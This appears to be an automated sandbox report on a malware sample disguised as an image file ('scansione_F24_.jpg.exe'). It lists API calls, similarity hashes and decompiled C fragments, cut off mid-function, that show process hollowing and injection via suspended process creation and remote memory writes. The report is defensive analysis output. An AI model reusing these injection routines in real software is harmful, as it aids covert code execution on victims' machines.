  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141memorythread
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}






0x00401012
0x00401014
0x0040101c
0x00401026
0x0040101e
0x0040101f
0x0040101f
0x0040102d

APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E144C, Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 49 Total matches: 9memory
Similarity
  • Total matches: 9
  • API ID: HeapFreeStrStrI
  • String ID: pnls
  • API String ID: 4137399961-141991303
  • Opcode ID: 4aa7b909af106ac1487055971ad23c5d9ff314578936fa2f1abc21ea428e854d
  • Instruction ID: a541ced8c8c75d727343971dda9e244897b1605c7a85f4116a33065e88e68885
  • Opcode Fuzzy Hash: E6D095824D6F9B47C9517014971DE702580FF430D3D9B726405C1434515F00301F1D1D
  • Instruction Fuzzy Hash: a541ced8c8c75d727343971dda9e244897b1605c7a85f4116a33065e88e68885
APIs
    • Part of subcall function 002E47D3: memcpy.NTDLL(00000004,?,?,?,00000000), ref: 002E48C3
  • HeapFree.KERNEL32(00000000,?,?), ref: 002E14BE
    • Part of subcall function 002E3D12: GetLocaleInfoA.KERNELBASE(00000400,0000005A,00000000,00000004,?,?,002E1499,?,002E7494,pnls,00000000,002E618C,0000000C), ref: 002E3D27
    • Part of subcall function 002E3D12: GetSystemDefaultUILanguage.KERNEL32(?,?,002E1499,?,002E7494,pnls,00000000,002E618C,0000000C,?,?,?,002E1800,00000000,?,002E7494), ref: 002E3D31
  • StrStrIA.SHLWAPI(00000000,002E7494), ref: 002E14A4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E29FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1395, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71 Total matches: 162processmemory
Similarity
  • Total matches: 162
  • API ID: CreateProcessGetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 1501718689-2746444292
  • Opcode ID: ec666d8859198cc6dc2f36418ca03840fabeabaa94e38ef7fe01e5326dfd4177
  • Instruction ID: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
  • Opcode Fuzzy Hash: 73E0D8861F0CD5D2C8946488F1A3F51E7202F9045ACCEA72106A9281676E24F45F8BA9
  • Instruction Fuzzy Hash: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
APIs
  • memset.NTDLL ref: 002E13B5
    • Part of subcall function 002E3340: GetProcAddress.KERNEL32(002E866B,002E45D9,00000000,002E618C,00000000,00000000,?,?,?,002E11A6,?,002E618C,00000000,00000000), ref: 002E3354
  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 002E13EE
  • GetLastError.KERNEL32(00000001), ref: 002E1422
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E1433
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Process Name: crypmgmt.exe Analysis ID: 68428

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:E5C7B986B6FD3733504DB3FD6D6FAADA
Total matches:37
Initial Analysis Report:Open
Initial sample Analysis ID:68428
Initial sample SHA 256:9D2D7459EDA5BC0063FC6EF47DE20AFBFA28AA6981F0EE63D90AE3E10EC4F835
Initial sample name:scansione_F24_.jpg.exe

Similar Executed Functions

Function 002E3122, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: e71ad6eecb970af1def45c3799b202ba83529c651fa6d32aa02a68984f086bcb
  • Instruction ID: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
  • Opcode Fuzzy Hash: 7BE0F1411C06C3F798EA64406103F84D7A0FE10A51C9C6B16C1F87E1D00F30305F5A2F
  • Instruction Fuzzy Hash: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
APIs
  • NtOpenProcess.NTDLL(002E618C,00000400,?,002E7494), ref: 002E316A
  • NtOpenProcessToken.NTDLL(002E618C,00000008,00000000), ref: 002E317D
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,002E618C), ref: 002E3198
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,002E618C,002E618C,002E618C), ref: 002E31B5
  • memcpy.NTDLL(00000000,00000000,0000001C), ref: 002E31C2
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
  • NtClose.NTDLL(00000000), ref: 002E31D4
  • NtClose.NTDLL(002E618C), ref: 002E31DD
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95threadsynchronization
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
